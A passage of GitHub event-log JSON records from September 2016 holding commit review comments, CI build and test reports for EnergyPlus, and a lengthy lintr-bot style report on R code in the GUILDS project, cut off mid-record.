{"id":"4603457883","type":"CommitCommentEvent","actor":{"login":"mwalle"},"repo":{"name":"jbaltes/python-ixia"},"payload":{"comment":{"id":19132728,"position":32,"line":198,"path":"pyixia/__init__.py","commit_id":"a53a0343cab4a64229b10db609bf71c82f9852a8","created_at":"2016-09-22T16:07:49Z","updated_at":"2016-09-22T16:07:49Z","body":"automatically apply? maybe add parameter autoapply=False?"}},"created_at":"2016-09-22T16:07:49Z"}
{"id":"4603459172","type":"CommitCommentEvent","actor":{"login":"opntr"},"repo":{"name":"HardenedBSD/hardenedBSD"},"payload":{"comment":{"id":19132730,"position":4,"line":38,"path":"libexec/rtld-elf/map_object.c","commit_id":"699831ecceb7ceb71034a4d75d0ea9b4906b3897","created_at":"2016-09-22T16:08:02Z","updated_at":"2016-09-22T16:08:02Z","body":"This should go before the non-system includes."}},"created_at":"2016-09-22T16:08:02Z"}
{"id":"4603460244","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19132733,"position":null,"line":null,"path":null,"commit_id":"7a78e4a6a1e6898b3d2e5b65817da156887755a3","created_at":"2016-09-22T16:08:12Z","updated_at":"2016-09-22T16:08:12Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1126](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13989&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T16:08:12Z"}
{"id":"4603460754","type":"CommitCommentEvent","actor":{"login":"elfring"},"repo":{"name":"gozfree/libraries"},"payload":{"comment":{"id":19132734,"position":13,"line":43,"path":"autogen_lib.sh","commit_id":"6d6742fbf84b844b3b5fb2ae2ce0d3847d5217a4","created_at":"2016-09-22T16:08:17Z","updated_at":"2016-09-22T16:08:17Z","body":"How do you think about to reduce the probability for name clashes a bit more by [adding another prefix (or suffix) to such include guards](https://en.wikipedia.org/wiki/Include_guard#Difficulties \"Coherent naming scheme for include guards?\")?"}},"created_at":"2016-09-22T16:08:17Z"}
{"id":"4603461110","type":"CommitCommentEvent","actor":{"login":"FrankenMan"},"repo":{"name":"GusCaplan/googlebot"},"payload":{"comment":{"id":19132736,"position":null,"line":null,"path":null,"commit_id":"dc8608363b32665b678ee4d8d8b6363d8b002f33","created_at":"2016-09-22T16:08:21Z","updated_at":"2016-09-22T16:08:21Z","body":"That's a nice commit desc you got there"}},"created_at":"2016-09-22T16:08:21Z"}
{"id":"4603461435","type":"CommitCommentEvent","actor":{"login":"mwalle"},"repo":{"name":"jbaltes/python-ixia"},"payload":{"comment":{"id":19132737,"position":45,"line":207,"path":"pyixia/__init__.py","commit_id":"a53a0343cab4a64229b10db609bf71c82f9852a8","created_at":"2016-09-22T16:08:24Z","updated_at":"2016-09-22T16:08:24Z","body":"looks like a hack :hammer: "}},"created_at":"2016-09-22T16:08:24Z"}
{"id":"4603462091","type":"CommitCommentEvent","actor":{"login":"snicolet"},"repo":{"name":"snicolet/Stockfish"},"payload":{"comment":{"id":19132740,"position":null,"line":null,"path":null,"commit_id":"9df3d60efa063adf509705ab5246fed94d37b780","created_at":"2016-09-22T16:08:31Z","updated_at":"2016-09-22T16:08:31Z","body":"@pb00068 Why ?"}},"created_at":"2016-09-22T16:08:31Z"}
{"id":"4603464195","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19132748,"position":null,"line":null,"path":null,"commit_id":"90ed550c3f6477a6c057eba6283312f74e26bafe","created_at":"2016-09-22T16:08:52Z","updated_at":"2016-09-22T16:08:52Z","body":"develop (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (1768 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-90ed550c3f6477a6c057eba6283312f74e26bafe-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> \n"}},"created_at":"2016-09-22T16:08:52Z"}
{"id":"4603470681","type":"CommitCommentEvent","actor":{"login":"grappigegovert"},"repo":{"name":"Fastjur/SEM-Project"},"payload":{"comment":{"id":19132757,"position":17,"line":40,"path":"src/test/java/net/liquidpineapple/pang/ApplicationTest.java","commit_id":"2209a26661c2643e4ba9228ac3488df7e2251ad2","created_at":"2016-09-22T16:09:43Z","updated_at":"2016-09-22T16:09:43Z","body":"Nice"}},"created_at":"2016-09-22T16:09:43Z"}
{"id":"4603471970","type":"CommitCommentEvent","actor":{"login":"Schimmelreiter"},"repo":{"name":"oe-alliance/e2openplugin-OpenWebif"},"payload":{"comment":{"id":19132761,"position":null,"line":null,"path":null,"commit_id":"18c4ac00f1e998d3c2f765a6b8f0eefc4ccfa0fb","created_at":"2016-09-22T16:09:57Z","updated_at":"2016-09-22T16:09:57Z","body":"This is bullshit.\r\n\r\nNot commenting any blah doesn't mean agreeing with it.\r\nAnd merging another pull just to revert is even more crap.\r\n"}},"created_at":"2016-09-22T16:09:57Z"}
{"id":"4603472560","type":"CommitCommentEvent","actor":{"login":"baelish"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19132766,"position":106,"line":106,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T16:10:03Z","updated_at":"2016-09-22T16:10:03Z","body":"s/it/them/ (as names is plural)"}},"created_at":"2016-09-22T16:10:03Z"}
{"id":"4603478431","type":"CommitCommentEvent","actor":{"login":"baelish"},"repo":{"name":"tests-always-included/style-guide"},"payload":{"comment":{"id":19132783,"position":108,"line":108,"path":"lang/js/index.md","commit_id":"1ca18d7e825df017be3055d81cd85a0673987e66","created_at":"2016-09-22T16:11:02Z","updated_at":"2016-09-22T16:11:02Z","body":"s/codes/code/"}},"created_at":"2016-09-22T16:11:02Z"}
{"id":"4603478861","type":"CommitCommentEvent","actor":{"login":"nebukazar"},"repo":{"name":"nebukazar/OneeChan"},"payload":{"comment":{"id":19132784,"position":null,"line":null,"path":null,"commit_id":"0a7977afe44c9098f1264ab0bea6d28ca1fbec95","created_at":"2016-09-22T16:11:07Z","updated_at":"2016-09-22T16:11:07Z","body":"# Issue #68 and not #65 ."}},"created_at":"2016-09-22T16:11:07Z"}
{"id":"4603479207","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19132786,"position":null,"line":null,"path":null,"commit_id":"842606b3fc7815ff50fb0c6ecb91716f9b5185db","created_at":"2016-09-22T16:11:10Z","updated_at":"2016-09-22T16:11:10Z","body":"develop (Myoldmopar) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1768 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-842606b3fc7815ff50fb0c6ecb91716f9b5185db-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T16:11:10Z"}
{"id":"4603488722","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19132804,"position":null,"line":null,"path":null,"commit_id":"83800f3c8407b4567361598551c107ec24043279","created_at":"2016-09-22T16:12:43Z","updated_at":"2016-09-22T16:12:43Z","body":"#2520943-WindowsCalc-Engine_Integration (vidanovic) - Win64-Windows-7-VisualStudio-12: Tests Failed (1766 of 2339 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-83800f3c8407b4567361598551c107ec24043279-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-75.5%25-red.svg)</a> \n"}},"created_at":"2016-09-22T16:12:43Z"}
{"id":"4603490222","type":"CommitCommentEvent","actor":{"login":"benbuckman"},"repo":{"name":"lpinca/shopify-token"},"payload":{"comment":{"id":19132808,"position":null,"line":null,"path":null,"commit_id":"70f3e58bd99c635610c6a20ee5c95c10bdb17bc3","created_at":"2016-09-22T16:12:58Z","updated_at":"2016-09-22T16:12:58Z","body":"👍 \r\nCurious why you implemented a custom timeout rather than use [`timed-out`](https://github.com/floatdrop/timed-out) (as you suggested in https://github.com/lpinca/shopify-token/issues/4)?"}},"created_at":"2016-09-22T16:12:58Z"}
{"id":"4603493880","type":"CommitCommentEvent","actor":{"login":"an0n981"},"repo":{"name":"M66B/BackPackTrackII"},"payload":{"comment":{"id":19132819,"position":null,"line":null,"path":null,"commit_id":"c00c1bce9ecf430350aef2c81a9627b7b28ff419","created_at":"2016-09-22T16:13:31Z","updated_at":"2016-09-22T16:13:31Z","body":"It's alive :). Will an update be pushed to the play store or do we need to compile ourselves?"}},"created_at":"2016-09-22T16:13:31Z"}
{"id":"4603499908","type":"CommitCommentEvent","actor":{"login":"MichaelXavier"},"repo":{"name":"bermanjosh/bloodhound"},"payload":{"comment":{"id":19132829,"position":null,"line":null,"path":null,"commit_id":"7ffb3d2fdef1307b0b9c5731909edac89a9bdc67","created_at":"2016-09-22T16:14:29Z","updated_at":"2016-09-22T16:14:29Z","body":"This feels a bit leaky to me. I believe these parsers will always succeed (maybe thats ok). So for instance if there's a bug with the version number parser I've implemented now or going forward, it will just report that there was no version, masking the error. One alternative here is to have something like `newtype MaybeNA a = MaybeNA { maybeNA :: Maybe a }` and `instance FromJSON a => FromJSON (MaybeNA a)` that specifically parses the \"NA\" case. Then in your parsers here it would be like `MaybeNA load <- o .: \"load_average\"`"}},"created_at":"2016-09-22T16:14:29Z"}
{"id":"4603500490","type":"CommitCommentEvent","actor":{"login":"ConnorVG"},"repo":{"name":"CachetHQ/Cachet"},"payload":{"comment":{"id":19132830,"position":19,"line":48,"path":"app/Repositories/Metric/MySqlRepository.php","commit_id":"1fdda0319914ebf13cf2816926536ea13c3ec5cb","created_at":"2016-09-22T16:14:35Z","updated_at":"2016-09-22T16:14:35Z","body":"Bah, fail."}},"created_at":"2016-09-22T16:14:35Z"}
{"id":"4603501511","type":"CommitCommentEvent","actor":{"login":"nkaraolis"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19132833,"position":38,"line":82,"path":"app/uk/gov/hmrc/ssttp/services/CalculatorService.java","commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-22T16:14:45Z","updated_at":"2016-09-22T16:14:45Z","body":"Fixed :+1: "}},"created_at":"2016-09-22T16:14:45Z"}
{"id":"4603502653","type":"CommitCommentEvent","actor":{"login":"gabriele-v"},"repo":{"name":"moneymanagerex/moneymanagerex"},"payload":{"comment":{"id":19132836,"position":null,"line":null,"path":null,"commit_id":"7deec12048d29cb44f37f802aa89eee1cd76752f","created_at":"2016-09-22T16:14:56Z","updated_at":"2016-09-22T16:14:56Z","body":"Please double check DB changes: if someone have already used a choice custom field, it will crash or produce strange results. I hope that no-one is using it yet.. "}},"created_at":"2016-09-22T16:14:56Z"}
{"id":"4603503337","type":"CommitCommentEvent","actor":{"login":"nkaraolis"},"repo":{"name":"hmrc/self-service-time-to-pay"},"payload":{"comment":{"id":19132840,"position":null,"line":null,"path":null,"commit_id":"4b4c4449d816833a2bb9f0e52b697324e5aa2be2","created_at":"2016-09-22T16:15:04Z","updated_at":"2016-09-22T16:15:04Z","body":"Comments seen :8ball: "}},"created_at":"2016-09-22T16:15:04Z"}
{"id":"4603505320","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"thijsjanzen/GUILDS"},"payload":{"comment":{"id":19132844,"position":null,"line":null,"path":null,"commit_id":"7d53ec880bab76308a45deb7d45d53fa7607d1e7","created_at":"2016-09-22T16:15:20Z","updated_at":"2016-09-22T16:15:20Z","body":"[R/Condition.R:23:17:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  k  <-  lgamma((theta_x / 2) + (theta_y / 2)) -\n                ^\n```\n[R/Condition.R:25:9:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L25) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n        ^\n```\n[R/Condition.R:25:43:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L25) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  l  <- ( (theta_x / 2) - 1) * log(nx) + ((theta_y / 2) - 1) * log(ny)\n                                          ^\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L137) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:137:9:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L137) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  ll <- logLikelihood.Guilds(parameters, model, sadx, sady, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:140:23:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L140) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  conditional_part <- calc_conditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L146) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, kda_x, kda_y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:166:9:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L166) *style:* **Variable and function names should be all lowercase.**\n```r\n​  ll <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J,\n        ^~~~~~~~~~~~\n```\n[R/Condition.R:170:14:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L170) *warning:* **no visible global function definition for ‘calc_conditional’**\n```r\n​  cond_ll <- calc_conditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L175) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L175) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(init_vals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L179) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:179:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L179) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_x <- calcKDA(sadx)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:180:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L180) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  kda_y <- calcKDA(sady)\n           ^~~~~~~\n```\n[R/Condition.R:201:17:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L201) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:209:10:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/Condition.R#L209) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(init_vals, g, verbose)\n         ^~~~~~~\n```\n[R/drawLocal.R:8:19:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L8) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      return(-1 * pm_sadaux(x, I, th, j, k))\n                  ^~~~~~~~~\n```\n[R/drawLocal.R:9:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L9) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:10:36:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L10) *style:* **Commas should always have a space after.**\n```r\n​    xmax <- stats::optimize(f, c(0,1))$minimum\n                                   ^\n```\n[R/drawLocal.R:11:13:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    ymax <- pm_sadaux(xmax, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:12:11:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y0 <- pm_sadaux(0, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th == 1)) {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- 0\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else if ((k == j) && (th < 1)) {\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  y[idx1] <- Inf\n^~\n```\n[R/drawLocal.R:17:16:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​        return(pm_sadaux(x, I, th, j, k) - ymax + 1)\n               ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:22:11:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L22) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​    y1 <- pm_sadaux(x1, I, th, j, k)\n          ^~~~~~~~~\n```\n[R/drawLocal.R:23:10:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L23) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​    while(ymax < (y1 + 1)) {\n         ^\n```\n[R/drawLocal.R:25:13:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​      y1 <- pm_sadaux(x1, I, th, j, k)\n            ^~~~~~~~~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tf <- function(x) {\n^~\n```\n[R/drawLocal.R:27:19:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L27) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tf <- function(x) {\n                 ~^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n^~~~\n```\n[R/drawLocal.R:28:12:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x, I, th, j, k)- ymax + 1)\n           ^~~~~~~~~\n```\n[R/drawLocal.R:29:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L29) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L30) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:30:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L30) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\t\n^~\n```\n[R/drawLocal.R:31:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L31) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n^~\n```\n[R/drawLocal.R:31:22:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                    ~^~~\n```\n[R/drawLocal.R:31:60:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L31) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txplu <- stats::uniroot(f, c(xmax, x1), tol = pracma::eps())$root\n                                                          ~^~\n```\n[R/drawLocal.R:32:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L32) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n^~\n```\n[R/drawLocal.R:32:22:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                    ~^~~\n```\n[R/drawLocal.R:32:30:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                            ~^~\n```\n[R/drawLocal.R:32:35:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L32) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                 ~^\n```\n[R/drawLocal.R:32:36:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L32) *style:* **Trailing whitespace is superfluous.**\n```r\n​\t\txlft <- xmax - 10 * (xmax - xmin) \n                                   ^\n```\n[R/drawLocal.R:33:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L33) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txlft <- max(0, xlft)\n^~\n```\n[R/drawLocal.R:33:22:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L33) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txlft <- max(0, xlft)\n                    ~^~~\n```\n[R/drawLocal.R:34:1:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L34) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n^~\n```\n[R/drawLocal.R:34:22:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                    ~^~~\n```\n[R/drawLocal.R:34:30:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 * (xplu - xmax)\n                            ~^~\n```\n[R/drawLocal.R:34:35:](https://github.com/thijsjanzen/GUILDS/blob/7d53ec880bab76308a45deb7d45d53fa7607d1e7/R/drawLocal.R#L34) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txrgt <- xmax + 10 